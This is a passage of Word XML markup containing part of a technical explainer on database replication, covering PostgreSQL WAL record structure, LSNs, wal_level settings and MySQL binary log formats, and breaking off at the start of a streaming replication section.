    <w:p w14:paraId="3D251AEC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAL structure in PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538693EB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE58372" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WAL file: 16MB segment, named by LSN (Log Sequence Number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF0ADE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Segment: 000000010000000000000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4BD8E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CBC312" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>WAL record structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F075E21" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  xl_tot_len:  4 bytes  (total record length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B31AF7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  xl_xid:      4 bytes  (transaction ID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E3CB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  xl_prev:     8 bytes  (LSN of previous WAL record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B064D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  xl_info:     1 byte   (record type flags)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD9410" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  xl_rmid:     1 byte   (resource manager ID — which subsystem created this record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7525E65A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  xl_crc:      4 bytes  (CRC32C checksum of record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0301E8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  data:        variable (resource manager-specific payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CFAD1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1FDF2674" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Resource managers (rmid):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED2F3CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  XLOG:      Checkpoint records, timeline changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDFDA24" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Transaction: COMMIT, ABORT, PREPARE records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC0424F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Storage:   Relation creation, deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBCC97B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Heap:      INSERT, UPDATE, DELETE, HOT_UPDATE on heap tuples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A6C64" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Btree:     B-Tree index modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D2A26" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Hash:      Hash index modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F6A3FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Gin:       GIN index modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDCC85" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BD938" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The LSN (Log Sequence Number):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E8F715" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>The LSN is a 64-bit monotonically increasing integer representing a byte offset in the WAL stream. Every WAL record has a unique LSN. The LSN is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>universal clock</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> of the database — every change, every transaction commit, every checkpoint is identified by its LSN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595BD43E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA32C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replication in terms of LSNs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAAD77B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary current LSN:  0/F234A890  (furthest byte written to WAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1965B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica flush LSN:    0/F234A020  (furthest byte durably written to replica disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F399A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica apply LSN:    0/F234A000  (furthest byte applied to replica data files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73319DFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186D2F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replication lag = Primary LSN - Replica apply LSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5848D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                  = bytes of WAL not yet applied on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF244B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E500FF5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Translated to time lag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10812B7C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    lag_bytes / avg_WAL_generation_rate = approximate lag in seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466DE2BA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    PostgreSQL: pg_stat_replication shows write_lag, flush_lag, replay_lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FD9A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WAL levels and their replication implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6CCA16" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91643D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>wal_level = minimal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BF70FB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Logs only what's needed for crash recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125E363C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Cannot support replication (insufficient information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435368C0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E65621" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>wal_level = replica (default for replication):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C831BA9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Adds information needed for WAL shipping and streaming replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8FCFC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Includes: heap tuple data, index changes, lock information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E1A2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F06E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>wal_level = logical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61982ACC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Adds information needed for logical decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEC960" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Records: old tuple values (for UPDATE/DELETE replication), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D70259E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           replica identity columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125FEBA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Required for: logical replication, CDC (Change Data Capture), Debezium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E02390" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Higher WAL volume than replica level (~20-30% more)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C10024" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MySQL Binary Log — The Alternative WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F1AB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>MySQL uses a separate </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binary log (binlog)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> for replication, distinct from the InnoDB redo log (which is for crash recovery). This dual-log architecture introduces complexity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42212D82" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDBA946" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>InnoDB redo log: records physical page changes for crash recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF99C20" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Binary log:      records logical changes for replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E74C39" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="2C63DCF5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Transaction commit with binlog:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2069F7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Phase 1 (InnoDB prepare): write transaction to redo log, mark as prepared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8DDCBC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Phase 2 (binlog write): write transaction to binary log, fsync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959CE05" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Phase 3 (InnoDB commit): mark transaction as committed in redo log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454178B9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC1220D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Two-phase commit between InnoDB and binlog:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B444C8D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If crash between Phase 1 and 2: transaction rolled back on recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46399291" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If crash between Phase 2 and 3: transaction committed (binlog is durable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B89A3F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Binlog is the source of truth for what's committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A022700" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9EE2BF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Binary log formats:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D989E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  STATEMENT: logs the SQL statement text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084E06E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Pro: compact, human-readable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2BFB1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Con: non-deterministic statements (NOW(), RAND(), UUID()) produce different</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0BA26" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         results on replica — data divergence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B121D45" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9B543" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ROW: logs before/after row images for each changed row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB92F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Pro: deterministic — replica always produces same result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3226D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Con: verbose for bulk operations (UPDATE with 1M rows = 1M row images in binlog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1207B090" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D443A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  MIXED: uses STATEMENT by default, ROW for non-deterministic statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF3C96" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Compromise but adds complexity to replication monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C42653" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFF2435" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Production recommendation: ROW format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231CC7DE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Deterministic, safe for all statement types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C557C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Verbose but binlog compression (MySQL 8.0+) reduces storage impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8349D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="301393D1">
          <v:rect id="_x0000_i5511" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16673837" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Physical Replication — Byte-Level WAL Streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E44CE8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Streaming Replication — The PostgreSQL Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2167193B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL streaming replication transmits WAL records from primary to replica in real-time as they are generated — not in batches or files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3FA1B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The connection establishment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B7C37" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56490D31" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica connects to primary in replication mode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BE804" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Connection string: "host=primary dbname=replication user=replicator replication=database"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150CBC7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A66178" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
